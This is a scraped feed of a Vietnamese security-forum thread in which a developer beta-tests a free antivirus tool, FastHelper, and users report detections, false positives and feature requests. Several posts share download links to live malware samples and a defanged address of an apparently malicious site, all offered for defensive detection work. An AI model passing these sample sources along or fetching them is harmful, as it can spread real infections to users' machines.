<![CDATA[Latest posts for the topic "Thử nghiệm chương trình diệt Virus mới"]]> /hvaonline/posts/list/28.html JForum - http://www.jforum.net Thử nghiệm chương trình diệt Virus mới Giới thiệu: [FireLion] FastHelper được xây dựng để tìm kiếm và tiêu diệt các đoạn mã độc hại nhằm giúp cho môi trường internet ở Vietnam "sạch" hơn. Chúng tôi xây dựng chương trình vào thời gian rãnh với niềm hy vọng giúp ích một chút nào đó cho cộng đồng sử dụng máy tính tại Vietnam. Do đó, chương trình hoàn toàn miễn phí.   Xem thêm tại: http://fasthelper.fire-lion.com/ Hiện nay chương trình đang phát hành phiên bản 5.0.1 Alpha với mục đích thử nghiệm. Mong chờ sự đóng góp của mọi người. PS: Dự án này mang tính freeware nên hy vọng hỏng bị warn vì tội quảng cáo :D]]> /hvaonline/posts/list/10351.html#59412 /hvaonline/posts/list/10351.html#59412 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#59424 /hvaonline/posts/list/10351.html#59424 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#59463 /hvaonline/posts/list/10351.html#59463 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#59476 /hvaonline/posts/list/10351.html#59476 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#59479 /hvaonline/posts/list/10351.html#59479 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#59481 /hvaonline/posts/list/10351.html#59481 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#59529 /hvaonline/posts/list/10351.html#59529 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#59533 /hvaonline/posts/list/10351.html#59533 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#59542 /hvaonline/posts/list/10351.html#59542 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#59558 /hvaonline/posts/list/10351.html#59558 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#59569 /hvaonline/posts/list/10351.html#59569 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#59578 /hvaonline/posts/list/10351.html#59578 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#59580 /hvaonline/posts/list/10351.html#59580 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#59581 /hvaonline/posts/list/10351.html#59581 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#59592 /hvaonline/posts/list/10351.html#59592 GMT Thử nghiệm chương trình diệt Virus mới

tmd wrote:
Mod cứ vào mấy trang crack,... mấy link sex đảm bảo không thiếu bất kỳ con gì hết. Với tạo vài cái mail cho nó nhận mail là đủ.  
:lol:) ]]>
/hvaonline/posts/list/10351.html#59593 /hvaonline/posts/list/10351.html#59593 GMT
Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#59594 /hvaonline/posts/list/10351.html#59594 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#59595 /hvaonline/posts/list/10351.html#59595 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#59598 /hvaonline/posts/list/10351.html#59598 GMT Thử nghiệm chương trình diệt Virus mới


]]>
/hvaonline/posts/list/10351.html#59599 /hvaonline/posts/list/10351.html#59599 GMT
Thử nghiệm chương trình diệt Virus mới hướng hueristic gì gì đó diệt được phiên bản mới phát triển từ gốc   Mọi thứ đang đi lên từ zero, chuyện gì cũng phải cần thời gian ;). Hiện nay thì chức năng quét AutoIt ít ra cũng khá hơn những AV khác. Đó là chương trình có thể detect được các dạng AutoIt cải tiến hoặc mới phát hành với tên gọi: AutoIt.General.
Tính năng phát hiện ngay khi download về máy, mới unrar từ file nén, hoặc là test file trước khi chạy file thực thi...  
AutoProtect người dùng khi execute file bị nhiễm.]]>
/hvaonline/posts/list/10351.html#59600 /hvaonline/posts/list/10351.html#59600 GMT
Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#59603 /hvaonline/posts/list/10351.html#59603 GMT Thử nghiệm chương trình diệt Virus mới

tmd wrote:
Nên lụm luôn phụ tùng .dll của các thứ đó. Các loại script đuôi vbs.dll ... . Chướng ngại inject .dll vào các process khác.  
uhm, có. Như trong hình minh hoạ ở trên, quét luôn cả dll của Pacgen. Quan trọng là mẫu :)]]>
/hvaonline/posts/list/10351.html#59605 /hvaonline/posts/list/10351.html#59605 GMT
Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#59606 /hvaonline/posts/list/10351.html#59606 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#59607 /hvaonline/posts/list/10351.html#59607 GMT Thử nghiệm chương trình diệt Virus mới
]]>
/hvaonline/posts/list/10351.html#59608 /hvaonline/posts/list/10351.html#59608 GMT
Thử nghiệm chương trình diệt Virus mới
Lần 2: Sau khi nhất Diệt, quét lại lần nữa
]]>
/hvaonline/posts/list/10351.html#59611 /hvaonline/posts/list/10351.html#59611 GMT
Thử nghiệm chương trình diệt Virus mới - Nếu explore.exe nhiễm worm thì fash-helper sẽ kill mất shell của windows.   Hoàng chưa hiểu phần này của bạn ? Explorer.exe nhiễm worm là như thế nào ? Bạn có thể cho Hoàng mẫu worm nhiễm vào exe ? Thank gsmth]]> /hvaonline/posts/list/10351.html#59613 /hvaonline/posts/list/10351.html#59613 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#59621 /hvaonline/posts/list/10351.html#59621 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#59622 /hvaonline/posts/list/10351.html#59622 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#59625 /hvaonline/posts/list/10351.html#59625 GMT Thử nghiệm chương trình diệt Virus mới

tmd wrote:
mod thử với loại inject .dll vào explorer.exe và các .exe khác đi. Mẫu là http://forum.spywareterminator.com/Default.aspx?g=posts&t=1524 Cái thứ .dll này nó chích thêm vào danh sách load .dll của .exe . file lây nhiểm để tạo .dll này thì tui ko thấy, chỉ thấy khi nó đã inject vào tùm lum thứ rồi. 
Do chỉ có file .dll nên Hoàng không thể cho nó inject được :)]]>
/hvaonline/posts/list/10351.html#59627 /hvaonline/posts/list/10351.html#59627 GMT
Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#59649 /hvaonline/posts/list/10351.html#59649 GMT Thử nghiệm chương trình diệt Virus mới Nên ad mẫu các loại exploit thông dụng nhất trong vòng 3 năm trở lại đây.   hi, hiện nay chỉ có mình Hoàng phát triển dự án. Nên add các loại exploit trong vòng 3 năm là điều... không thể :)). Và Hoàng chỉ handle dự án khi có thời gian rãnh :)
Bao gồm exploit xử lý file văn bản, ảnh, html, ... Link mấy cái exploit .ani http://forum.spywareterminator.com/Default.aspx?g=posts&t=1591  
Hoàng đã add code chống IE tự thực thi mấy mã độc hại rồi, người dùng sẽ được hỏi. Screenshot:
Mẫu của mấy loại malware hàng top ở VN hiện tai , người ta không biết lấy mẫu nên quá ít nguồn. Mấy anh nghiên cứu code của forum ko tiếp xúc với TG nên chẳng có thông tin gì. Còn mẫu lây qua USB thì NHIỀU.  
Thế nên mục tiêu hàng đầu là diệt các loại malware của VN trước]]>
/hvaonline/posts/list/10351.html#59668 /hvaonline/posts/list/10351.html#59668 GMT
Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#59670 /hvaonline/posts/list/10351.html#59670 GMT Thử nghiệm chương trình diệt Virus mới

tmd wrote:
Mod ad mấy loại exploit nội trong năm đi. Các loại top malware trong các tháng từ đầu năm tới giờ.Mẫu thì lúc nào có , gửi vào trong này. Nguồn thì ai có gì gữi vào trong đây. Ban đầu chắc phải tự tìm mẫu mà update trước rồi. 
Hầu hết các malware của VN hiện nay đều được viết bằng AutoIt. FastHelper detect ra đó tmd, các loại AutoIt viết sau này chương trình cũng có thể tự động nhận dạng mà không cần phải cập nhật database. Chương trình sẽ cảnh báo người dùng với tên là: AutoIt.General]]>
/hvaonline/posts/list/10351.html#59684 /hvaonline/posts/list/10351.html#59684 GMT
Re: Thử nghiệm chương trình diệt Virus mới http://s14.turboupload.com/f/1799456/1179347609/e25ab1f229453df563dc4a24c401d5a3/Quarantine.rar không được thì dùng http://www.yourfilehost.com/media.php?cat=other&file=Quarantine.rar Con ncscv32.exe này inject vào nhiều kiểu đuôi lắm *.COM *.EXE *.PIF *.SCR , *.asp *.aspx *.htm *.html *.jsp *.php Mới vừa lụm nó lại từ chương trình cứu dữ liệu, thấy hình như trình AntiVir PE không thèm ngó tới nó nữa (không hiểu).]]> /hvaonline/posts/list/10351.html#59689 /hvaonline/posts/list/10351.html#59689 GMT Thử nghiệm chương trình diệt Virus mới Mới vừa lụm nó lại từ chương trình cứu dữ liệu, thấy hình như trình AntiVir PE không thèm ngó tới nó nữa (không hiểu).   Tại vì các file đã recover của bạn bị hư. Nội dung không còn đúng nữa nên AntiVir bỏ qua là điều dễ hiểu :)]]> /hvaonline/posts/list/10351.html#59693 /hvaonline/posts/list/10351.html#59693 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#59797 /hvaonline/posts/list/10351.html#59797 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#59948 /hvaonline/posts/list/10351.html#59948 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#59971 /hvaonline/posts/list/10351.html#59971 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#60075 /hvaonline/posts/list/10351.html#60075 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#60158 /hvaonline/posts/list/10351.html#60158 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#60226 /hvaonline/posts/list/10351.html#60226 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#60284 /hvaonline/posts/list/10351.html#60284 GMT Thử nghiệm chương trình diệt Virus mới Setup Package 5.2.2: Kernel 5.2.2, Database 05/19/2007 02:38 PM 1. Kernel 5.2.2: Remove Viking.1/Worm/Win32 variants 2. Database: 05/19/2007 02:38 PM + MulDrop.1/Trojan/Win32 + Primo.1/Trojan/Win32   Thường thì các file bị infected vẫn có thể khôi phục lại được nhưng hơi phức tạp. Nên các AV deleted đi luôn, điển hình là AVG mà Hoàng đã sử dụng để kiểm tra :)]]> /hvaonline/posts/list/10351.html#60328 /hvaonline/posts/list/10351.html#60328 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#60341 /hvaonline/posts/list/10351.html#60341 GMT Thử nghiệm chương trình diệt Virus mới Code:
Free 24/7 technical support	yes	yes	no
High-speed downloads	yes	yes	no
Consent for commercial use	yes	yes	no
Anti-Virus	yes	yes	yes
Anti-Spyware	yes	no	no
Anti-Spam	yes	no	no
Firewall	yes	no	no
Multiple languages
http://free.grisoft.com/doc/avg-anti-virus-free/lng/us/tpl/v5 Không khác Scan Engine giữa bản free và không free ;)]]>
/hvaonline/posts/list/10351.html#60358 /hvaonline/posts/list/10351.html#60358 GMT
Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#60360 /hvaonline/posts/list/10351.html#60360 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#60385 /hvaonline/posts/list/10351.html#60385 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#60386 /hvaonline/posts/list/10351.html#60386 GMT Thử nghiệm chương trình diệt Virus mới
]]>
/hvaonline/posts/list/10351.html#60812 /hvaonline/posts/list/10351.html#60812 GMT
Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#60829 /hvaonline/posts/list/10351.html#60829 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#60846 /hvaonline/posts/list/10351.html#60846 GMT Thử nghiệm chương trình diệt Virus mới Code:
22/05/2007:
Chương trình quét nhầm 2 file:

    C:\Program Files\NetMeeting\cb32.exe
    C:\Program Files\NetMeeting\wb32.exe

Bị nhiễm loại virus Viking.1. Bạn nên bỏ qua 2 tập tin này (uncheck) hoặc add vào "Chứng thực" để không quét nhầm.
Hoàng chưa cập nhật con Polip, sẽ cố gắng cập nhật sớm. Sau đây là kết quả check Polip của 1 số AV khác. AntiVir:
Avast:
PC Tools:
và cuối cùng là BKAV :):
]]>
/hvaonline/posts/list/10351.html#60872 /hvaonline/posts/list/10351.html#60872 GMT
Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#60958 /hvaonline/posts/list/10351.html#60958 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#60986 /hvaonline/posts/list/10351.html#60986 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#61029 /hvaonline/posts/list/10351.html#61029 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#61422 /hvaonline/posts/list/10351.html#61422 GMT Thử nghiệm chương trình diệt Virus mới +Bác không nên lấy file size làm yếu tố quyết định để quét, cách này tuy nhanh nhưng dễ nhầm lắm   Không chỉ quét filesize, còn có quét signature nữa cơ mà. Nếu đúng file size mới quét signature.
Bác thử thay cái này bằng MD5 xem sao  
Quét MD5 không thích hợp cho variants có filesize khác nhau. Tuy nhiên, nếu bạn đã reverse engineer chương trình (hoặc db) thì cũng biết là Hoàng cũng có quét MD5 đó chứ hả ;)
vd 2 file cb32.exe,wb32.exe mà bạn tmd nói bị chết oan do có size = item72  
Không phải trùng filesize, mà do Hoàng lấy nhầm đoạn mã nên mới bị trường hợp này. Trong database mới Hoàng đã chỉnh lại chỗ này và không còn bị quét nhầm nữa (vẫn sử dụng Engine cũ).
Bị nhiễm loại virus Viking.1. Bạn nên bỏ qua 2 tập tin này (uncheck) hoặc add vào "Chứng thực" để không quét nhầm. Ngoài ra, bạn có thể down file data mới nhất (05/23/2007 04:14 PM) về cập nhật cho chương trình để tránh lỗi trên.  
+Đa số các file bác lấy có 5 byte để kiểm tra là hơi ít(các AV khác tối thiểu cũng 30-50 byte), chắc bác sợ tăng db  
Như Hoàng đã nói ở trên, không chỉ signature mà còn kết hợp với filesize nữa.
+Tính năng phát hiện autoit của bác chuẩn thật, nhưng có phải cái nào cũng là virus đâu, may mà bác còn hiện list, không thì chết bao nhiêu file của em  
Bạn có thể add vào mục Chứng thực. Lần sau chương trình sẽ không quét ra nữa. Còn nếu bạn không biết AutoIt là gì thì xoá đi chắc cũng không thành vấn đề :)
Bác xem còn gì hay hay tích hợp vào AV nhanh nhanh cho anh em xài nhé  
Các tính năng cơ bản có lẽ là đủ rồi. Mục tiêu trước mắt là tìm diệt các loại mã độc hại đang phát tán tại Vietnam :). Thank quanghabk đã góp ý.]]>
/hvaonline/posts/list/10351.html#61490 /hvaonline/posts/list/10351.html#61490 GMT
Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#61509 /hvaonline/posts/list/10351.html#61509 GMT Thử nghiệm chương trình diệt Virus mới vd 2 file cb32.exe,wb32.exe mà bạn tmd nói bị chết oan do có size = item72   Không phải trùng filesize, mà do Hoàng lấy nhầm đoạn mã nên mới bị trường hợp này. Trong database mới Hoàng đã chỉnh lại chỗ này và không còn bị quét nhầm nữa (vẫn sử dụng Engine cũ).   Em chưa thử db mới, nhưng với cái em đã dùng ,em đã thử tạo 1 file trắng (toàn byte 0) có kích thước = 12288byte, chương trình của bác vẫn bảo là virus mà :)), bác thử xem sao.]]> /hvaonline/posts/list/10351.html#61563 /hvaonline/posts/list/10351.html#61563 GMT Thử nghiệm chương trình diệt Virus mới Chương trình cần thêm chức năng hồi phục 1 số thứ của Win đã bị Virus quậy như: TaskManager FolderOption Registry Edit Cmd Hidden Option v.v... Đỡ mất công Fix lại.   Có chứ, fix lại khi có loại nào disable mấy chức năng này thôi. Còn không thì bạn có thể dùng tool Enable kèm theo chương trình để Enable.
Em chưa thử db mới, nhưng với cái em đã dùng ,em đã thử tạo 1 file trắng (toàn byte 0) có kích thước = 12288byte, chương trình của bác vẫn bảo là virus mà , bác thử xem sao.  
Đã test, đâu có bị đâu ?
]]>
/hvaonline/posts/list/10351.html#61580 /hvaonline/posts/list/10351.html#61580 GMT
Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#61583 /hvaonline/posts/list/10351.html#61583 GMT Thử nghiệm chương trình diệt Virus mới

LeVuHoang wrote:
Đã test, đâu có bị đâu ?  
Còn đây là kết quả của em:
@tmd: máy của mình không bao giờ bị nhiễm virus cả. :)) ]]>
/hvaonline/posts/list/10351.html#61603 /hvaonline/posts/list/10351.html#61603 GMT
Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#61666 /hvaonline/posts/list/10351.html#61666 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#61753 /hvaonline/posts/list/10351.html#61753 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#61895 /hvaonline/posts/list/10351.html#61895 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#61903 /hvaonline/posts/list/10351.html#61903 GMT Thử nghiệm chương trình diệt Virus mới http://www.freefileupload.net/file.php?file=files/280507/1180362781/_yupdater.exe Ngồi ngay cái máy dính polip.A. Chạy không thoát nó. Ngoài ra còn bị dính một loại keylog chưa biết nhưng tự nó connect tới mail.hsc.com.vn như mấy lần trước. Hy vọng pass hva chưa bị mất. PS: Giờ mới biết nó ra đời 2004 và tiếp tục được update cho tới ngày nay. BKAV bó chim.
Nó lây vầy thì diệt nổi gì nữa. PS: Ngồi một hồi mới biết máy dính SC keylog. :(( :cry: :cry: :cry: ]]>
/hvaonline/posts/list/10351.html#62161 /hvaonline/posts/list/10351.html#62161 GMT
Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#62472 /hvaonline/posts/list/10351.html#62472 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#62473 /hvaonline/posts/list/10351.html#62473 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#62644 /hvaonline/posts/list/10351.html#62644 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#62655 /hvaonline/posts/list/10351.html#62655 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#62657 /hvaonline/posts/list/10351.html#62657 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#62665 /hvaonline/posts/list/10351.html#62665 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#62677 /hvaonline/posts/list/10351.html#62677 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#62827 /hvaonline/posts/list/10351.html#62827 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#62842 /hvaonline/posts/list/10351.html#62842 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#62863 /hvaonline/posts/list/10351.html#62863 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#62866 /hvaonline/posts/list/10351.html#62866 GMT Thử nghiệm chương trình diệt Virus mới Gói setup: find not found ở cả 2 link!   sorry, Hoàng đã cập nhật lại link. @huynhfxvn: Vì chương trình của Hoàng có sử dụng một số 3rd components nên không có dùng chung được. Hiện nay, vấn đề Hoàng quan tâm nhất là những loại xuất hiện ở VN, còn đại trà trên thế giới chắc là phải nhờ các đại gia AV rùi :D]]> /hvaonline/posts/list/10351.html#62884 /hvaonline/posts/list/10351.html#62884 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#62892 /hvaonline/posts/list/10351.html#62892 GMT Thử nghiệm chương trình diệt Virus mới

tmd wrote:
Nên ăn mừng khi số update vược qua BKAV. :D) 
Chúc mừng đã vượt BKAV... Còn mấy virus macro thì xử lý sao đấy bác LeVuHoang ơi :)) ]]>
/hvaonline/posts/list/10351.html#62897 /hvaonline/posts/list/10351.html#62897 GMT
Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#62901 /hvaonline/posts/list/10351.html#62901 GMT Thử nghiệm chương trình diệt Virus mới Code:
http://www.freewebtown [chấm] com/gaigoitanbinh/index.html
Hiện nay theo Hoàng test thì BKAV và FastHelper có thể chặn được con này (chưa test với các AV khác). AVG thì không]]>
/hvaonline/posts/list/10351.html#62914 /hvaonline/posts/list/10351.html#62914 GMT
Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#62918 /hvaonline/posts/list/10351.html#62918 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#62980 /hvaonline/posts/list/10351.html#62980 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#63001 /hvaonline/posts/list/10351.html#63001 GMT Thử nghiệm chương trình diệt Virus mới

tmd wrote:
Software này giống như một anti soft bự , có cả update . Chổ update đó có vấn đề thì các kiểm tra viên lảnh đủ, nếu không có bảo vệ.  
như thế nào nếu chỗ ấy là http://hvaonline.net/~levuhoang/update/ ? :wink: ]]>
/hvaonline/posts/list/10351.html#63003 /hvaonline/posts/list/10351.html#63003 GMT
Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#63007 /hvaonline/posts/list/10351.html#63007 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#63009 /hvaonline/posts/list/10351.html#63009 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#63113 /hvaonline/posts/list/10351.html#63113 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#63185 /hvaonline/posts/list/10351.html#63185 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#63245 /hvaonline/posts/list/10351.html#63245 GMT Thử nghiệm chương trình diệt Virus mới

tmd wrote:
MOD thêm tính năng warn và tắt trình duyệt khi người ta tới một trang web down về một đoạn mã, kiểu .vbs , .js , iframe,... Hay bất kỳ trang web nào yêu cầu người dùng chạy một trong những kiểu code trên, không cần biết nó độc/lành.  
Không cần thiết phải tắt, có thể dùng cách như của KAS cũng được mà bạn. Tránh gây khó chịu cho người dùng .]]>
/hvaonline/posts/list/10351.html#63249 /hvaonline/posts/list/10351.html#63249 GMT
Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#63265 /hvaonline/posts/list/10351.html#63265 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#63311 /hvaonline/posts/list/10351.html#63311 GMT Thử nghiệm chương trình diệt Virus mới 6. Máy tôi bị restart liên tục khi chạy chương trình. Có cách nào khắc phục? _ Một số chương trình độc hại của Vietnam chống đỡ bằng cách restart liên tục nếu phát hiện ra các chương trình Anti Virus (BKAV, [FireLion] FastHelper...). Trong trường hợp này, ngay khi [FireLion] FastHelper được thực thi, bạn hãy bỏ chọn (uncheck) ô "Cho phép đóng ứng dụng" để tránh trường hợp bị restart. Hoặc có thể dùng công cụ Reboot Detector kèm theo để xác định xem tiến trình nào yêu cầu restart lại máy.   ]]> /hvaonline/posts/list/10351.html#63324 /hvaonline/posts/list/10351.html#63324 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#63340 /hvaonline/posts/list/10351.html#63340 GMT Re: Thử nghiệm chương trình diệt Virus mới Run When Windows Starts * Nghe anh, em bỏ chọn Cho phép đóng ứng dụng, hết khởi động lại máy luôn, 1 lúc sau mới biết là do nó, nên phải check mới khởi động cũng như tắt máy mới được. Thankz for support.]]> /hvaonline/posts/list/10351.html#63374 /hvaonline/posts/list/10351.html#63374 GMT Thử nghiệm chương trình diệt Virus mới - Thêm nút Exit cho nó ngầu.   Có chức năng Exit khi bạn right-click vào chương trình ở system tray. Bạn nghĩ sau nếu khi mở chương trình lên, 1 con AutoIt tự động click vào nút Exit của bạn ;)
- Bỏ/chọn chế độ Run When Windows Starts  
Một số người dùng có thể không thích chạy chương trình thường xuyên nên option này cũng có ích. Nếu bạn muốn tự chạy thì cứ để mặc định là được.
* Nghe anh, em bỏ chọn Cho phép đóng ứng dụng, hết khởi động lại máy luôn, 1 lúc sau mới biết là do nó, nên phải check mới khởi động cũng như tắt máy mới được.  
Chức năng "Cho phép đóng ứng dụng" chỉ nên được sử dụng khi máy bạn bị restart liên tục (do con AutoIt gây ra), lúc đó mới cần uncheck. Ngoài ra cứ để mặc định thì ổn. Thank bạn đã góp ý.]]>
/hvaonline/posts/list/10351.html#63381 /hvaonline/posts/list/10351.html#63381 GMT
Thử nghiệm chương trình diệt Virus mới Code:
http://fasthelper.fire-lion.com/download/AutoRunFixer.exe

]]>
/hvaonline/posts/list/10351.html#63382 /hvaonline/posts/list/10351.html#63382 GMT
Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#63472 /hvaonline/posts/list/10351.html#63472 GMT Re: Thử nghiệm chương trình diệt Virus mới http://fasthelper.fire-lion.com/download/AutoRunFixer.exe  Kô liệt kê được cái file .exe mà Autorun kích hoạt bác ạ. Em nghĩ nên gắn tool này vào cái chương trình kia và sẽ kiểm tra mỗi khi ó USB cắm vô máy, nếu thấy Autorun thì hiện ra cái tool này thì tốt hơn. Đa số người dùng rất kém hiểu biết về cái này. Họ thường có thói quen double click vào USB khi mới cắm vào máy mà kô biết kiểm tra gì cả và em thấy đa số AV kô tự động diệt file virus khi file đó ở chế độ +s(KAV cũng thế) nên chỉ tự động phát hiện được những file virus kô +s trong USB khi mới cắm vào máy thôi và như thế thì đã để lọt Autorun và cái file virus +s kia :)) Nếu người dùng có ý thức tự bật tool này lên để kiểm tra thì Tool này kô hơn chương trình Winrar là mấy :)) Nếu chỉ delete những dòng được bôi đen thôi thì tốt hơn, Em luôn để một file Autorun ổ D để kích hoạt một file .exe có tác dụng dọa và cản trở gà vào ổ này :)) Em kô bôi đen nó thế mà cái này của bác delete mất của em :)) Nó chỉ hiện được cái file Autorun.inf thôi còn cái cột fileExecute kia ghi là kô có. Em đã +s +h cho cái file exe kia :)) ]]> /hvaonline/posts/list/10351.html#63529 /hvaonline/posts/list/10351.html#63529 GMT Thử nghiệm chương trình diệt Virus mới http://download.microsoft.com/download/f/c/a/fca6767b-9ed9-45a6-b352-839afb2a2679/TweakUiPowertoySetup.exe: tìm My Computer > Autoplay > bỏ chọn tất cả drive ở Drives và type ở Types. -> hết autorun.]]> /hvaonline/posts/list/10351.html#63531 /hvaonline/posts/list/10351.html#63531 GMT Thử nghiệm chương trình diệt Virus mới

ThangCuEm wrote:
Chi cho phức tạp, dùng TweakUI turn off tính năng Autorun cho tất cả các ổ đĩa là xong: CD, USB, hard drive.... Tui không bao giờ cho thằng nào autorun cả, phải qua kiểm duyệt hết. 
là sao? tool kia là TweakUI mà :-o) ]]>
/hvaonline/posts/list/10351.html#63533 /hvaonline/posts/list/10351.html#63533 GMT
Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#63535 /hvaonline/posts/list/10351.html#63535 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#63537 /hvaonline/posts/list/10351.html#63537 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#63539 /hvaonline/posts/list/10351.html#63539 GMT Re: Thử nghiệm chương trình diệt Virus mới

gsmth wrote:
Cho Ghost Ship cái tool này: tìm My Computer > Autoplay > bỏ chọn tất cả drive ở Drives và type ở Types. -> hết autorun.  
Em đã làm như bác nói nhưng hôm nay mở máy vẫn thấy dòng Auto đậm ở trên đỉnh, click đúp thì file .exe vẫn chạy :)) -> Vẫn chưa hết được autorun đâu bác :lol:) Em thấy khoái cái chức năng hihe ổ của cái này. Nhưng chỉ hide ở Acc đang dùng còn sang limited Acc vẫn thấy ổ hiện ra :D) Hide ổ bằng gpedit.msc hiệu quả hơn :)) Còn nhiều chức năng phết, từ từ khám phá :)) ]]>
/hvaonline/posts/list/10351.html#63623 /hvaonline/posts/list/10351.html#63623 GMT
Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#63666 /hvaonline/posts/list/10351.html#63666 GMT Thử nghiệm chương trình diệt Virus mới Trong 2 thư mục \windows và \system32 của hdh windows, lập trình có cho phép show ra những file nào được gọi là lạ khác với những file windows tạo ra lúc mới setup. Ví dụ như các file .exe ,.dll, .sys,.... không có trong danh sách của windows lúc mới tạo. Tool hỗ trợ soft cũng được.   Kết hợp 2 tools: dir và diff để làm việc đó. ]]> /hvaonline/posts/list/10351.html#63671 /hvaonline/posts/list/10351.html#63671 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#63676 /hvaonline/posts/list/10351.html#63676 GMT Thử nghiệm chương trình diệt Virus mới System Restore rất dễ dùng khi có vấn đề gì đó :) (người sử dụng ở đây tất nhiên là nắm cơ bản về Windows rồi ngoài việc click & point mouse ra).]]> /hvaonline/posts/list/10351.html#63678 /hvaonline/posts/list/10351.html#63678 GMT Thử nghiệm chương trình diệt Virus mới Kô liệt kê được cái file .exe mà Autorun kích hoạt bác ạ.   Nếu file .exe tồn tại thì sẽ được hiển thị, không thì sẽ được hiện trạng thái: not available.
Em nghĩ nên gắn tool này vào cái chương trình kia và sẽ kiểm tra mỗi khi ó USB cắm vô máy, nếu thấy Autorun thì hiện ra cái tool này thì tốt hơn.  
